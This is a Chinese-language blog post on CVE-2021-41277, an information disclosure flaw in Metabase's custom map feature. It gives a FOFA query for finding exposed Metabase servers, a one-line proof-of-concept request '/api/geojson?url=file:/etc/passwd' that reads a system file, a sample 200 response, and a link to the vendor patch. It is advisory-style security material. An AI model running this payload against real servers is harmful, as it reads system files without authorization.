当前位置:首页 » 《随便一记》 » 正文

CVE-2021-41277——Metabase 信息泄露漏洞_LiBai'S BLOG

4 人参与  2022年05月21日 17:40  分类 : 《随便一记》  评论

点击全文阅读


Metabase 信息泄露漏洞

    • 漏洞简介
    • FOFA语法
    • POC
    • 漏洞测试
    • 漏洞修复

在这里插入图片描述

漏洞简介

Metabase是美国Metabase公司的一个开源数据分析平台。

Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。

  • CNNVD编号:CNNVD-202111-1565
  • 危害等级: 超危
  • CVE编号: CVE-2021-41277

FOFA语法

app="Metabase"

在这里插入图片描述

POC

"{{BaseURL}}/api/geojson?url=file:/etc/passwd"

参考

https://github.com/0x0021h/expbox/blob/main/CVE-2021-41277.yaml

漏洞测试

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
返回200

HTTP/1.1 200 OK
Server: nginx/1.16.0
Date: Sun, 21 Nov 2021 03:04:41 GMT
Content-Type: text/html;charset=utf-8
Connection: close
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Last-Modified: Sun, 21 Nov 2021 03:04:41 +0000
Strict-Transport-Security: max-age=31536000
X-Permitted-Cross-Domain-Policies: none
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'none'; script-src 'self' 'unsafe-eval' https://maps.google.com https://apis.google.com https://www.google-analytics.com https://*.googleapis.com *.gstatic.com  'sha256-lMAh4yjVuDkQ9NqkK4H+YHUga+anpFs5JAuj/uZh0Rs=' 'sha256-7t0fjA/BVlVoDzQGo5fjx1QcGZGP/YHzqHjtle6rQr0=' 'sha256-JJa56hyDfUbgNfq+0nq6Qs866JKgZ/+qCq2pkDJED8k='; child-src 'self' https://accounts.google.com; style-src 'self' 'unsafe-inline'; font-src 'self' ; img-src * 'self' data:; connect-src 'self' metabase.us10.list-manage.com ; manifest-src 'self';
Expires: Tue, 03 Jul 2001 06:00:00 GMT
Content-Length: 162961
......

漏洞修复

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr

点击全文阅读


本文链接:http://zhangshiyu.com/post/40559.html

漏洞  修复  泄露  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 终章小说顾澜音封灼年完结篇(碑婚)已更新+延伸(顾澜音封灼年)清爽版
  • 宋予柯奕烜小说小说全集+延伸+完本(玩笑沦陷)畅享在线阅读
  • 宋璃陆泽野小说(七零大院:离婚后嫁绝嗣京少多胎)小说结尾+隐藏篇章(宋璃陆泽野)畅享阅读
  • 完结文重生后我让校花保管所有准考证完结+结局+番外宝藏美文列表_完结文重生后我让校花保管所有准考证完结+结局+番外宝藏美文(秦雨然江述怀洛瑶)
  • 重生在高考前,我笑着送小青梅和小混混去庆祝成人礼一口气读完乔念沈晏安陆坤完本_重生在高考前,我笑着送小青梅和小混混去庆祝成人礼一口气读完(乔念沈晏安陆坤)
  • 此后锦书休寄免费品鉴(阮时苒厉寒霆),此后锦书休寄免费品鉴
  • 高分_玩笑沦陷小说(宋予柯奕烜)(玩笑沦陷)全本完整阅读
  • 离婚后,假千金她成了万人迷是什么小说(江浸月陆明渊)(离婚后,假千金她成了万人迷)全本完整清爽版在线+无广告结局
  • 晚晚的重生回到全家被杀的除夕夜+整本林炎晚晚全书在线
  • 独家贺青芷姜亦恒无删减(忽闻弦歌落)(贺青芷姜亦恒)TXT免费版阅读
  • 全书浏览闻说爱意忽已晚(林舒晚楚寒屿)_闻说爱意忽已晚(林舒晚楚寒屿)全书结局
  • 休寄锦书诉衷肠江揽月季明轩完本_休寄锦书诉衷肠(江揽月季明轩)

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1